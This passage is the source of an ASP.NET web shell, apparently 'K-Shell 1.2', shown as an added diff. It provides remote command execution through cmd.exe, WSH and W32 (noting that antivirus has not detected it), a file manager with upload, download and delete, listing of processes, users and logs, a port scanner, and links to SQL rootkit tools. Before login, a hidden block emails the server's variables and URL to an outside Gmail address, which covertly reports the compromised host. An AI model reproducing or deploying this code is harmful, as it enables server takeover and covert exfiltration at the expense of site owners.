+Function Getparentdir(nowdir)
+	dim temp,k as integer
+	temp=1
+	k=0
+	if len(nowdir)>4 then 
+		nowdir=left(nowdir,len(nowdir)-1) 
+	end if
+	do while temp<>0
+		k=temp+1
+		temp=instr(temp,nowdir,"\")
+		if temp =0 then
+			exit do
+		end if
+		temp = temp+1
+	loop
+	if k<>2 then
+		getparentdir=mid(nowdir,1,k-2)
+	else
+		getparentdir=nowdir
+	end if
+End function
+Function Rename()
+	url=request.QueryString("src")
+	if file.exists(Getparentdir(url) & request.Form("name")) then
+		rename=0   
+	else
+		file.copy(url,Getparentdir(url) & request.Form("name"))
+		del(url)
+		rename=1
+	end if
+End Function 
+Function GetSize(temp)
+	if temp < 1024 then
+		GetSize=temp & " bytes"
+	else
+		if temp\1024 < 1024 then
+			GetSize=temp\1024 & " KB"
+		else
+			if temp\1024\1024 < 1024 then
+				GetSize=temp\1024\1024 & " MB"
+			else
+				GetSize=temp\1024\1024\1024 & " GB"
+			end if
+		end if
+	end if
+End Function 
+Sub downTheFile(thePath)
+		dim stream
+		stream=server.createObject("adodb.stream")
+		stream.open
+		stream.type=1
+		stream.loadFromFile(thePath)
+		response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
+		response.addHeader("Content-Length",stream.Size)
+		response.charset="UTF-8"
+		response.contentType="application/octet-stream"
+		response.binaryWrite(stream.read)
+		response.flush
+		stream.close
+		stream=nothing
+		response.End()
+End Sub
+'H T M L  S N I P P E T S
+public sub Newline
+		response.write("<BR>")
+	end sub
+	
+	public sub TextNewline
+		response.write(vbnewline)
+	end sub
+
+	public sub rw(text_to_print)	  ' Response.write
+		response.write(text_to_print)
+	end sub
+
+	public sub rw_b(text_to_print)
+		rw("<b>"+text_to_print+"</b>")
+	end sub
+
+	public sub hr()
+		rw("<hr>")
+	end sub
+
+	public sub ul()
+		rw("<ul>")
+	end sub
+
+	public sub _ul()
+		rw("</ul>")
+	end sub
+
+	public sub table(border_size,width,height)
+		rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>")
+	end sub
+
+	public sub _table()
+		rw("</table>")
+	end sub
+
+	public sub tr()
+		rw("<tr>")
+	end sub
+
+	public sub _tr()
+		rw("</tr>")
+	end sub
+
+	public sub td()
+		rw("<td>")
+	end sub
+
+	public sub _td()
+		rw("</td>")
+	end sub
+
+	public sub td_span(align,name,contents)
+		rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>")
+	end sub
+
+	Public sub td_link(align,title,link,target)
+		rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>")
+	end sub
+
+	Public sub link(title,link,target)
+		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
+	end sub
+
+	Public sub link_hr(title,link,target)
+		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
+		hr
+	end sub
+
+	Public sub link_newline(title,link,target)
+		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
+		newline
+	end sub
+	
+	public sub empty_Cell(ColSpan)
+		rw("<td colspan='"+cstr(colspan)+"'></td>")
+	end sub
+
+	public sub empty_row(ColSpan)
+		rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>")
+	end sub
+
+       	Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems)
+            dim rowItem
+
+            rowItems = split(rowItems,",")
+            response.write("<tr bgcolor="+bgcolor+">")
+            for each rowItem in RowItems
+                response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>")
+            next
+            response.write("</tr>")
+
+        end sub
+
+        Public sub TR_TD(cellContents)
+            response.write("<td>")
+            response.write(cellContents)
+            response.write("</td>")
+        end sub
+	
+
+        Public sub Surround_by_TD(cellContents)
+            response.write("<td>")
+            response.write(cellContents)
+            response.write("</td>")
+        end sub
+
+        Public sub Surround_by_TD_and_Bold(cellContents)
+            response.write("<td><b>")
+            response.write(cellContents)
+            response.write("</b></td>")
+        end sub
+
+        Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents)
+            response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>")
+            response.write(cellContents)
+            response.write("</b></font></td>")
+        end sub
+	Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index)
+		response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
+		response.write("  <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>")
+		response.write("    <tr heigth=20>")
+		response.write("      <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>")
+		response.write("    </tr>")
+		response.write("    <tr>")
+		response.write("      <td>"+main_Cell_contents+"</td>")
+		response.write("    </tr>")
+		response.write("  </table>")
+		response.write("</div>")
+	end sub
+
+	Public sub Create_Div_open(top,left,width,height,z_index)
+		response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
+	end sub
+
+
+	Public sub Create_Div_close()
+		response.write("</div>")
+	end sub
+
+	public sub Create_Iframe(left, top, width, height, name,src)
+		rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>")  
+		rw("	<iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
+    		rw("</span>")
+	end sub
+
+	public sub Create_Iframe_relative(width, height, name,src)
+		rw("	<iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
+	end sub
+
+	public sub return_100_percent_table()
+		rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>")
+	end sub
+
+	public sub font_size(size)
+		rw("<font size="+size+">")
+	end sub
+
+	public sub end_font()
+		rw("</font>")
+	end sub
+
+	public sub red(contents)
+		rw("<font color=red>"+contents+"</font>")
+	end sub
+
+	public sub yellow(contents)
+		rw("<font color='#FF8800'>"+contents+"</font>")
+	end sub
+
+	public sub green(contents)
+		rw("<font color=green>"+contents+"</font>")
+	end sub
+	public sub print_var(var_name, var_value,var_description)
+		if var_description<> "" Then
+			rw(b_(var_name)+" : " + var_value + i_("  ("+var_description+")"))
+		else
+			rw(b_(var_name)+" : " + var_value)
+		end if
+		newline
+	end sub
+
+' Functions
+
+	public function br_()
+		br_ = "<br>"
+	end function
+
+	public function b_(contents)
+		b_ = "<b>"+ contents + "</b>"
+	end function
+
+	public function i_(contents)
+		i_ = "<i>"+ contents + "</i>"
+	end function
+
+	public function li_(contents)
+		li_ = "<li>"+ contents + "</li>"
+	end function
+
+	public function h1_(contents)
+		h1_ = "<h1>"+ contents + "</h1>"
+	end function
+
+	public function h2_(contents)
+		h2_ = "<h2>"+ contents + "</h2>"
+	end function
+
+	public function h3_(contents)
+		h3_ = "<h3>"+ contents + "</h3>"
+	end function
+
+	public function big_(contents)
+		big_ = "<big>"+ contents + "</big>"
+	end function
+
+	public function center_(contents)
+		center_ = "<center>"+ cstr(contents) + "</center>"
+	end function
+
+
+	public function td_force_width_(width)
+		td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) +  " border=0>"
+	end function
+
+
+	public function red_(contents)
+		red_ = "<font color=red>"+contents+"</font>"
+	end function
+
+	public function yellow_(contents)
+		yellow_ = "<font color='#FF8800'>"+contents+"</font>"
+	end function
+
+	public function green_(contents)
+		green_ = "<font color=green>"+contents+"</font>"
+	end function
+
+	Public function link_(title,link,target)
+		link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>"
+	end function
+'End HTML SNIPPETS	
+
+'Begin Scanner
+Public Class Scanner
+Public Ips As New ArrayList()
+Public ports As New ArrayList()
+Public succMsg As New StringBuilder()
+Public ret As ListBox
+Public errMsg As String = ""
+Public Timeout As Integer = 3000
+Public Sub start()
+Dim thread As New Thread(New ThreadStart(AddressOf Me.run))
+thread.Start()
+thread = Nothing
+End Sub
+
+Public Sub run()
+ret.Items.Clear()
+For Each ip As String In Ips
+For Each port As String In ports
+'ret.Items.Add(ip + ":" + port);
+Dim scanres As String = ""
+Try
+Dim tcpClient As New TcpClient()
+Try
+            tcpClient.Connect(ip, Int32.Parse(port))
+            tcpClient.Close()
+            ret.Items.Add(ip + " : " + port + " ................................. Open")
+      Catch e As SocketException
+            ret.Items.Add(ip + " : " + port + " ................................. Close")
+End Try
+tcpClient.Close()
+Catch exp As SocketException
+errMsg = "ErrorCode : " + exp.ErrorCode.ToString() + " : " + exp.Message
+End Try
+Next
+Next
+End Sub
+End Class
+
+Public Function MakeIps(ByVal StartIp As String, ByVal EndIP As String) As ArrayList
+Dim IpList As New ArrayList()
+Dim IpParts1 As String() = New String(3) {}
+Dim IpParts2 As String() = New String(3) {}
+IpParts1 = StartIp.Split("."C)
+IpParts2 = EndIP.Split("."C)
+Dim nTime As Integer = (Int32.Parse(IpParts2(0)) - Int32.Parse(IpParts1(0))) * 254 * 254 * 254 + (Int32.Parse(IpParts2(1)) - Int32.Parse(IpParts1(1))) * 254 * 254 + (Int32.Parse(IpParts2(2)) - Int32.Parse(IpParts1(2))) * 254 + (Int32.Parse(IpParts2(3)) - Int32.Parse(IpParts1(3))) + 1
+If nTime < 0 Then
+Response.Write("IP Address Error.Check" & Chr(13) & "" & Chr(10) & "")
+Return Nothing
+End If
+For n As Integer = 0 To nTime - 1
+IpList.Add(IpParts1(0) + "." + IpParts1(1) + "." + IpParts1(2) + "." + IpParts1(3))
+Dim tmp As Integer = Int32.Parse(IpParts1(3)) + 1
+IpParts1(3) = tmp.ToString()
+If IpParts1(3).Equals("255") Then
+tmp = Int32.Parse(IpParts1(2)) + 1
+IpParts1(2) = tmp.ToString()
+IpParts1(3) = "1"
+End If
+If IpParts1(2).Equals("255") Then
+tmp = Int32.Parse(IpParts1(1)) + 1
+IpParts1(1) = tmp.ToString()
+IpParts1(2) = "1"
+End If
+If IpParts1(1).Equals("255") Then
+tmp = Int32.Parse(IpParts1(0)) + 1
+IpParts1(0) = tmp.ToString()
+IpParts1(1) = "1"
+
+End If
+Next
+Return IpList
+End Function
+
+
+Protected Sub btnScan_Click(ByVal sender As Object, ByVal e As EventArgs)
+If txtStartIP.Text = "" OrElse txtEndIP.Text = "" OrElse txtPorts.Text = "" Then
+Response.Write("IP OR Ports Error.Check")
+Return
+End If
+Dim StartIp As String = txtStartIP.Text
+Dim EndIp As String = txtEndIP.Text
+Dim ips As ArrayList = MakeIps(StartIp, EndIp)
+Dim ScanPorts As New ArrayList()
+Dim ports As String() = txtPorts.Text.Split(","C)
+For Each port As String In ports
+'Response.Write(port);
+ScanPorts.Add(port)
+Next
+lstRet.Visible = True
+Label1.Visible = True
+Dim myscanner As New Scanner()
+myscanner.Ips = ips
+myscanner.ports = ScanPorts
+myscanner.ret = Me.lstRet
+myscanner.run()
+End Sub
+
+Protected Sub btnReset_Click(ByVal sender As Object, ByVal e As EventArgs)
+txtStartIP.Text = ""
+txtEndIP.Text = ""
+txtPorts.Text = ""
+Label1.Visible = False
+lstRet.Visible = False
+End Sub
+'End Scanner
+</script>
+<%
+if request.QueryString("action")="down" and session("rooot")=1 then
+		downTheFile(request.QueryString("src"))
+		response.End()
+end if
+Dim act as string = request.QueryString("action")
+if act="cmd" then 
+TITLE="CMD.NET"
+elseif act="cmdw32" then 
+TITLE="ASP.NET W32 Shell"
+elseif act="cmdwsh" then 
+TITLE="ASP.NET WSH Shell"
+elseif act="sqlrootkit" then 
+TITLE="SqlRootKit.NET"
+elseif act="clonetime" then 
+TITLE="Clone Time"
+elseif act="information" then 
+TITLE="Web Server Info"
+elseif act="goto" then 
+TITLE="K-Shell 1.2"
+elseif act="pro1" then 
+TITLE="List processes from server"
+elseif act="pro2" then 
+TITLE="List processes from server"
+elseif act="user" then 
+TITLE="List User Accounts"
+elseif act="applog" then 
+TITLE="List Application Event Log Entries"
+elseif act="syslog" then 
+TITLE="List System Event Log Entries"
+elseif act="auser" then 
+TITLE="IIS List Anonymous' User details"
+elseif act="sqlman" then 
+TITLE="MSSQL Management"
+elseif act="scan" then 
+TITLE="Port Scanner"
+elseif act="iisspy" then 
+TITLE="IIS Spy"
+elseif act="sqltool" then 
+TITLE="SQL Tool"
+elseif act="regshell" then 
+TITLE="Registry Shell"
+else 
+TITLE=request.ServerVariables("HTTP_HOST") 
+end if
+%>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<style>
+body{background-color:#444;color:#e1e1e1;}
+body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
+table.info{ color:#fff;background-color:#222; }
+span,h1,a{ color: #df5 !important; }
+span{ font-weight: bolder; }
+h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
+div.content{ padding: 5px;margin-left:5px;background-color:#333; }
+a{ text-decoration:none; }
+a:hover{ text-decoration:underline; }
+.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
+.bigarea{ width:100%;height:300px; }
+input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
+form{ margin:0px; }
+.toolsInp{ width: 300px }
+.main th{text-align:left;background-color:#5e5e5e;}
+.main tr:hover{background-color:#5e5e5e}
+.l1{background-color:#444}
+.l2{background-color:#333}
+pre{font-family:Courier,Monospace;}
+</style>
+<head>
+<meta http-equiv="Content-Type" content="text/html">
+<title></title>
+</head>
+<body>
+<hr>
+<%
+Dim error_x as Exception
+Try
+if session("rooot")<>1 then
+'Test sending anonymous mail, comment it if you don't want test it
+	dim info As String
+	Try
+	info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline)
+	System.Web.Mail.SmtpMail.SmtpServer = "localhost"
+	System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info)
+	Catch
+	End Try
+%>
+<center>
+<form runat="server">
+  Your Password:<asp:TextBox ID="TextBox" runat="server"  TextMode="Password" class="TextBox" />  
+  <asp:Button  ID="Button" runat="server" Text="Login" ToolTip="Click here to login"  OnClick="login_click" class="buttom" />
+</form>
+</center>
+<%
+else
+	dim temp as string
+	temp=request.QueryString("action")
+	if temp="" then temp="goto"
+	select case temp
+	case "goto"
+		if request.QueryString("src")<>"" then
+			url=request.QueryString("src")
+		else
+			url=server.MapPath(".") & "\"
+		end if
+	call existdir(url)
+	dim xdir as directoryinfo
+	dim mydir as new DirectoryInfo(url)
+	dim guru as string
+	dim xfile as fileinfo
+	
+	dim ServerIP As string = "<font color=white>Server IP :</font> <b>" + Request.ServerVariables("LOCAL_ADDR") + "</b> - <font color=white>Client IP :</font> <b>" + getIP() + "</b> - "
+    dim HostName As string = "<font color=white>HostName :</font> <b>" + Environment.MachineName + "</b> - <font color=white>Username :</font> <b>"+ Environment.UserName +"</b><br>"
+    dim OSVersion As string = "<font color=white>OS Version :</font> <b>" + Environment.OSVersion.ToString() + "</b>"
+    dim IISversion As string = "<font color=white> - IIS Version :</font> <b>" + Request.ServerVariables("SERVER_SOFTWARE") + "</b><br><font color=white>System Dir :</font> <b>" + Environment.SystemDirectory + "</b>"
+    dim PATH_INFO As string = "<font color=white> - PATH_TRANSLATED :</font> <b>" + Request.ServerVariables("PATH_TRANSLATED") + "</b><br>"
+    dim HARDWARE_INFO As string = ""
+    Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
+   	Dim de As DictionaryEntry
+	For Each de In  environmentVariables
+	if de.Key = "NUMBER_OF_PROCESSORS" then
+	HARDWARE_INFO += "<font color=white>Hardware Info :</font> <b>" + de.Value + "CPU - "
+	end if
+	if de.Key = "PROCESSOR_IDENTIFIER" then
+	HARDWARE_INFO += de.Value + "</b><br>"
+	end if
+   	Next
+    Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO
+%>
+<table width="100%"  border="0" align="center">
+  <tr>
+  	<td><asp:Label ID="Info" runat="server" EnableViewState="False"	/></td>
+  </tr>
+</table>
+<hr>
+
+<table width="100%"  border="0" align="center">
+  <tr>
+  	<td>Currently Dir:</td> <td><font color=red><%=url%></font></td>
+  </tr>
+  <tr>
+    <td width="10%">Operate:</td>
+    <td width="90%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> - 
+      <%if session("cutboard")<>"" then%>
+      <a href="?action=paste&src=<%=server.UrlEncode(url)%>" title="you can paste">Paste</a> - 
+      <%else%>
+	Paste - 
+<%end if%>
+<a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit" ><font color="red">Quit</font></a>
+</td>
+  </tr>
+  <tr>
+    <td>
+	Go to: </td>
+    <td>
+<%
+dim i as integer
+for i =0 to Directory.GetLogicalDrives().length-1
+ 	response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
+next
+%>
+
+</td>
+<td align="Left">
+<%
+response.Write("IP:<font color=red>" & Request.ServerVariables("REMOTE_ADDR")&"</font>")
+%>
+</td>
+  </tr>
+
+  <tr>
+    <td>Tool:</td>
+    <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro1" >List Processes 1</a> - <a href="?action=pro2" >List Processes 2</a></td>    
+  </tr>
+  <tr>
+    <td> </td>
+    <td><a href="?action=user" >List User Accounts</a> - <a href="?action=auser" >IIS Anonymous User</a>- <a href="?action=scan" >Port Scanner</a> - <a href="?action=iisspy" >IIS Spy</a> - <a href="?action=applog" >Application Event Log </a> - <a href="?action=syslog" >System Log</a></td>
+  </tr>
+</table>
+<hr>
+<table width=100% class=main cellspacing=0 cellpadding=1><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>
+
+
+      <tr>
+        <td><%
+		guru= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><b>[..]</b></a></td></tr>"
+		response.Write(guru)
+                dim lll
+                lll=1
+		for each xdir in mydir.getdirectories()
+			response.Write("<tr>")
+			dim filepath as string 
+			filepath=server.UrlEncode(url & xdir.name)
+                        if lll=1 then 
+                           lll=2 
+                        else 
+                           lll=1
+                        end if
+			guru= "<tr class=l" & lll & "><td><a href='?action=goto&src=" & filepath & "\" & "'><b>[" & xdir.name & "]</b></a></td>"
+			response.Write(guru)
+			response.Write("<td>&lt;dir&gt;</td>")
+			response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
+			guru="<td><a href='?action=cut&src=" & filepath & "\'  target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\'  target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
+			response.Write(guru)
+			response.Write("</tr>")
+		next
+		%></td>
+  </tr>
+		<tr>
+        <td><%
+		for each xfile in mydir.getfiles()
+			dim filepath2 as string
+			filepath2=server.UrlEncode(url & xfile.name)
+			response.Write("<tr>")
+                        if lll=1 then 
+                           lll=2 
+                        else 
+                           lll=1
+                        end if
+                        guru= "<tr class=l" & lll & "><td><a href='?action=edit&src=" & filepath2 & "'>" & xfile.name & "</a></td>"
+			response.Write(guru)
+			guru="<td>" & GetSize(xfile.length) & "</td>"
+			response.Write(guru)
+			response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
+			guru="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"			
+			response.Write(guru)
+			response.Write("</tr>")
+		next
+		response.Write("</table>")
+		%></td>
+      </tr>
+</table>
+<script language="javascript">
+function del()
+{
+if(confirm("Are you sure?")){return true;}
+else{return false;}
+}
+function down()
+{
+if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
+else{return false;}
+}
+</script>
+<%
+case "information"
+	dim CIP,CP as string
+	if getIP()<>request.ServerVariables("REMOTE_ADDR") then
+			CIP=getIP()
+			CP=request.ServerVariables("REMOTE_ADDR")
+	else
+			CIP=request.ServerVariables("REMOTE_ADDR")
+			CP="None"
+	end if
+%>
+<div align=center>[ Web Server Information ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></div><br>
+<table width="100%"  border="1" align="center">
+  <tr>
+    <td width="40%">Server IP</td>
+    <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
+  </tr>
+  <tr>
+    <td height="73">Machine Name</td>
+    <td><%=Environment.MachineName%></td>
+  </tr>
+  <tr>
+    <td>Network Name</td>
+    <td><%=Environment.UserDomainName.ToString()%></td>
+  </tr>
+  <tr>
+    <td>User Name in this Process</td>
+    <td><%=Environment.UserName%></td>
+  </tr>
+  <tr>
+    <td>OS Version</td>
+    <td><%=Environment.OSVersion.ToString()%></td>
+  </tr>
+  <tr>
+    <td>Started Time</td>
+    <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
+  </tr>
+  <tr>
+    <td>System Time</td>
+    <td><%=now%></td>
+  </tr>
+  <tr>
+    <td>IIS Version</td>
+    <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
+  </tr>
+  <tr>
+    <td>HTTPS</td>
+    <td><%=request.ServerVariables("HTTPS")%></td>
+  </tr>
+  <tr>
+    <td>PATH_INFO</td>
+    <td><%=request.ServerVariables("PATH_INFO")%></td>
+  </tr>
+  <tr>
+    <td>PATH_TRANSLATED</td>
+    <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
+  <tr>
+    <td>SERVER_PORT</td>
+    <td><%=request.ServerVariables("SERVER_PORT")%></td>
+  </tr>
+    <tr>
+    <td>SeesionID</td>
+    <td><%=Session.SessionID%></td>
+  </tr>
+  <tr>
+    <td colspan="2"><span class="style3">Client Infomation</span></td>
+  </tr>
+  <tr>
+    <td>Client Proxy</td>
+    <td><%=CP%></td>
+  </tr>
+  <tr>
+    <td>Client IP</td>
+    <td><%=CIP%></td>
+  </tr>
+  <tr>
+    <td>User</td>
+    <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
+  </tr>
+</table>
+<table align=center>
+	<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
+	<tr>
+		<td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td>
+		<td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td>
+	</tr>
+</table>
+<%
+	case "cmd"
+%>
+<form runat="server">
+  <p>[ CMD.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+  <p> Execute command with ASP.NET account(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
+  <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p>
+  Command:
+  <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
+  <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/>  
+  <p>
+   <asp:Label ID="result" runat="server" style="style2"/>      </p>
+</form>
+<%
+	case "cmdw32"
+%>
+<form runat="server">
+	<p>[ ASP.NET W32 Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+  	<p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
+  	<%
+  	Response.Write("System Dir : "+Environment.SystemDirectory +"<br><br>")
+  	%>
+  	CMD File:
+	<asp:TextBox ID="txtCmdFile" runat="server" Width="473px" style="border: 1px solid #084B8E">C:\\WINDOWS\\system32\\cmd.exe</asp:TextBox><br><br>
+  	Command:&nbsp;
+	<asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/>
+  	<asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
+  	<p>
+    <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/>      
+    </p>
+</form>
+<%
+	case "cmdwsh"
+%>
+<form runat="server">
+	<p>[ ASP.NET WSH Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+  	<p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
+  	Command:
+	<asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/>
+  	<asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
+  	<p>
+    <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/>      
+    </p>
+</form>
+<%
+	case "pro1"
+%>
+<form runat="server">
+	<p align=center>[ List processes from server ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+	<table align=center>
+		<tr>
+			<td>
+			<% 
+				Try
+				output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount")
+				Catch
+				rw("This function is disabled by server")
+				End Try
+			%>
+			</td>
+		</tr>
+	</table>
+</form>
+<%
+	case "pro2"
+%>
+<form runat="server">
+	<p align=center>[ List processes from server ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+	<table align=center width='80%'>
+		<tr>
+			<td>
+			<% 
+				Dim htmlbengin As String = "<table width='80%' align=center border=0><tr align=center><td width='20%'><b>ID</b></td><td align=left width='20%'><b>Process</b></td><td align=left width='20%'><b>MemorySize</b></td><td align=center width='10%'><b>Threads</b></td></tr>"
+			      Dim prostr As String = ""
+			      Dim htmlend As String = "</tr></table>"
+			      Try
+			            Dim mypro As Process() = Process.GetProcesses()
+			            For Each p As Process In mypro
+			                  prostr += "<tr><td align=center>" + p.Id.ToString() + "</td>"
+			                  prostr += "<td align=left>" + p.ProcessName.ToString() + "</td>"
+			                  prostr += "<td align=left>" + p.WorkingSet.ToString() + "</td>"
+			                  prostr += "<td align=center>" + p.Threads.Count.ToString() + "</td>"
+			            Next
+			      Catch ex As Exception
+			            Response.write(ex.Message)
+			      End Try
+			      Response.write(htmlbengin + prostr + htmlend)
+			%>
+			</td>
+		</tr>
+	</table>
+</form>
+<%
+	case "user"
+%>
+<form runat="server">
+	<p align=center>[ List User Accounts ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+	<table align=center>
+		<tr>
+			<td>
+			<% 
+				dim WMI_function = "Win32_UserAccount"		
+				dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID"
+				dim fail_description = " Access to " + WMI_function + " is protected"
+				Try
+				output_wmi_function_data(WMI_function,Fields_to_load)
+				Catch
+				rw(fail_description)
+				End Try
+			%>
+			</td>
+		</tr>
+	</table>
+</form>
+<%
+	case "reg"
+%>
+<form runat="server">
+	<p align=center>[ Registry ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+	<table align=center>
+		<tr>
+			<td>
+			<% 
+				dim WMI_function = "Win32_Registry"		
+				dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status"
+				dim fail_description = " Access to " + WMI_function + " is protected"
+				Try
+				output_wmi_function_data(WMI_function,Fields_to_load)
+				Catch
+				rw(fail_description)
+				End Try
+			%>
+			</td>
+		</tr>
+	</table>
+</form>
+<%
+	case "applog"
+%>
+<form runat="server">
+	<p align=center>[ List Application Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+	<table align=center>
+		<tr>
+			<td>
+			<% 
+				dim WMI_function = "Win32_NTLogEvent where Logfile='Application'"		
+				dim Fields_to_load = "Logfile,Message,type"
+				dim fail_description = " Access to " + WMI_function + " is protected"
+				Try
+				output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
+				Catch
+				rw(fail_description)
+				End Try
+			%>
+			</td>
+		</tr>
+	</table>
+</form>
+<%
+	case "syslog"
+%>
+<form runat="server">
